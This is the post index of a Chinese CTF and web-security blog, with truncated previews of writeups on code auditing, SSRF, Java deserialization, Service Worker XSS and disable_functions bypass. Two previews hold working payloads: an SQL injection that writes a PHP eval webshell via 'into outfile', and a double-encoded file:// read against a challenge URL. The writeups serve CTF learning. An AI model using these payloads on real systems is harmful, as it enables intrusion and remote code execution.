code-breaking2018

2021-05-25 23:05:00 901
ctf - 代码审计

闲来无事把code-breaking2018刷了。 function ```php <?php $action = $_GET['action'] ?? ''; $arg = $_GET['arg'] ?? ''; if(preg_match('/^[a-z0-9_]*$/isD', $action)) { show_source(FILE); } else { $ac...

闲来无事把code-breaking2018刷了。 function ```php <?php $actio...

阅读全文>>

3kCTF2021

2021-05-21 10:05:00 862
wp - 3kctf

AD 一段时间没打国际赛,最近陆队正在组建一支打国际赛的战队,我也混进去划了一下水,上周末我们也打了第一场国际赛试试水(虽然我在打国赛没怎么看题目),不过初次试水师傅们都很给力,个人认为成绩还算可以(No.9): 可以看到截图中出现的两支国内战队虽然也挺猛的,不过这俩支都是高校队伍,不允许外校加入,因此在这里我也给战队打个广告,路过的师傅可以看看:https://blog.zeddyu.i...

AD 一段时间没打国际赛,最近陆队正在组建一支打国际赛的战队,我也混进去划了一下水,上周末我们也打了第一场国际赛试...

阅读全文>>

Xss Via Service Worker

2021-05-04 00:05:00 855
Service Worker - xss

闲置了很久的东西,在做dicectf2021的Web IDE的时候再次碰到这个东西,特此学学。 Service Worker下文简称sw,在我的理解看来就类似于一个filter,是介于服务器与客户端之间的一个中间人,它会拦截当前网站的所有请求,根据其编写的逻辑,在请求需要转发给服务器时进行转发,否则就使用离线缓存。 sw它算是一个独立的,运行在浏览器后台的脚本,因此用它来执行消耗大资源的程度...

闲置了很久的东西,在做dicectf2021的Web IDE的时候再次碰到这个东西,特此学学。 Service W...

阅读全文>>

“红明谷”杯数据安全大赛技能场景赛

2021-04-03 00:04:00 1551
ctf - wp - 红明谷

签到 略过~ write_shell 代码审计: ```php <?php error_reporting(0); highlight_file(FILE); function check($input){ if(preg_match("/'| ||php|;|~|\^|\+|eval|{|}/i",$input)){ // if(preg_match("/'|...

签到 略过~ write_shell 代码审计: ```php <?php error_reporting(...

阅读全文>>

yso!cc6链学习

2021-03-29 18:03:00 781
代码审计 - 反序列化 - java

最近想起来学习java,看了下p神的java漫谈(十二),于是也跟着审了一下yso!cc6的链。 Gadget chain yso中提供的gadget chain为: Gadget chain: java.io.ObjectInputStream.readObject() java.util.HashSet.readObject() ...

最近想起来学习java,看了下p神的java漫谈(十二),于是也跟着审了一下yso!cc6的链。 Gadget c...

阅读全文>>

hws硬件营线上选拔赛

2021-02-06 18:02:00 685
ctf - wp - hws

NodeMce 不清楚是否非预期,一个strings直接能看到flag STM stm32单片机,给了一个bin文件,根据http://www.crystalradio.cn/thread-637028-1-1.html来反编译。 ```c _BYTE sub_8000314() { _BYTE v0; // r4 unsigned __int8 *v1; // r5 int v...

NodeMce 不清楚是否非预期,一个strings直接能看到flag STM stm32单片机,给了一个bin文...

阅读全文>>

两个有趣的ssrf安全问题研究

2021-02-06 18:02:00 1043
ssrf

文章首发于:i春秋 容错特性 我先甩出关于容错特性的一个概述:(php的容错特性)当有一个不存在的协议,即无法被成功解析,如hhhm://,将其放入file_get_contents中,会发现其报错,而究其所以是将这个自定义的协议置为null,而php中当协议为null或者file时会进行本地文件读取,也就是说我们可以当做进行本地文件的操作。 本地放一段代码: php <?php in...

文章首发于:i春秋 容错特性 我先甩出关于容错特性的一个概述:(php的容错特性)当有一个不存在的协议,即无法被成...

阅读全文>>

纵横杯

2020-12-28 10:12:00 966
ctf - wp - 纵横杯

easyci 注apache配置文件出来得到web路径为:/var/sercet/html/ 写shell,大小写绕过 password=a&username=-1' uNion sElect 1,'<?php eval($_POST[1]);?>' into outfile '/var/sercet/html/9.php'--+ hello_php www.zip源码...

easyci 注apache配置文件出来得到web路径为:/var/sercet/html/ 写shell,大小写...

阅读全文>>

bypass disable function学习

2020-12-25 23:12:00 1421
漏洞学习 - bypass disable function

文章首发于:合天 从phpinfo中获取可用信息 信息收集是不可缺少的一环;通常的,我们在通过前期各种工作成功执行代码 or 发现了一个phpinfo页面之后,会从该页面中搜集一些可用信息以便后续漏洞的寻找。 我谈谈我个人的几个偏向点: 版本号 最直观的就是php版本号(虽然版本号有时候会在响应头中出现),如我的机器上版本号为: PHP Version 7.2.9-1 那么找到版本号后就会综...

文章首发于:合天 从phpinfo中获取可用信息 信息收集是不可缺少的一环;通常的,我们在通过前期各种工作成功执行...

阅读全文>>

roarctf 2020

2020-12-07 21:12:00 729
ctf - wp - roar

虽然题目质量不错。 //但是被注入恶心到的两天 签到 直接读flag读不到,读源码发现是curl,可以二次编码绕过 Payload: http://47.104.232.98:49725/?url=file:///fla%25%36%37 Hi_433MHz 导入au,短的是0,长的是1: 得到: 011001100 011011000 011000010 011001110 011110...

虽然题目质量不错。 //但是被注入恶心到的两天 签到 直接读flag读不到,读源码发现是curl,可以二次编码绕过...

阅读全文>>


CopyRight © 2019-2020 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号